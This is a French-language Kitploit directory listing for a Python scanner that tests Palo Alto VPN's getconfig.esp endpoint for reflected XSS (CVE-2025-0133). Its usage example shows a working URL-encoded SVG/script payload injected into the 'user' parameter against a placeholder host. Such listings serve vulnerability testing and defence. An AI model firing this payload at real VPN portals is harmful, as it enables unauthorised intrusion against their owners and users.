Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-0133-exploit — Script Python pour détecter la vulnérabilité XSS réfléchie CVE-2025-0133 dans Palo Alto VPN en sondant le point de terminaison getconfig.esp et en injectant des charges utiles XSS. | Kitploit
Outils/GitHubGitHub/shawarkhanethicalhacker/cve-2025-0133-exploit
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubshawarkhanethicalhacker/cve-2025-0133-exploit

CVE-2025-0133-exploit

Script Python pour détecter la vulnérabilité XSS réfléchie CVE-2025-0133 dans Palo Alto VPN en sondant le point de terminaison getconfig.esp et en injectant des charges utiles XSS.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

CVE-2025-0133 Scan

Un script écrit en python pour vérifier l'existence d'une vulnérabilité de type Cross-Site Scripting réfléchi (CVE-2025-0133) affectant Palo Alto. Le fichier getconfig.esp est détecté et testé pour une XSS à l'aide du script fourni.

Utilisation :

root@kitploit:~
darkfear@b0x:~/CVE-2025-0133-exploit$ python3 cve-2025-0133_scan.py -u https://target.com
[*] Sending initial probe to https://target.com/ssl-vpn/getconfig.esp
[+] Target is using "Palo Alto". Testing XSS...
[*] Sending XSS payload...
[+] Target is VULNERABLE to reflected XSS.
[+] URL: https://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
Télécharger l’outil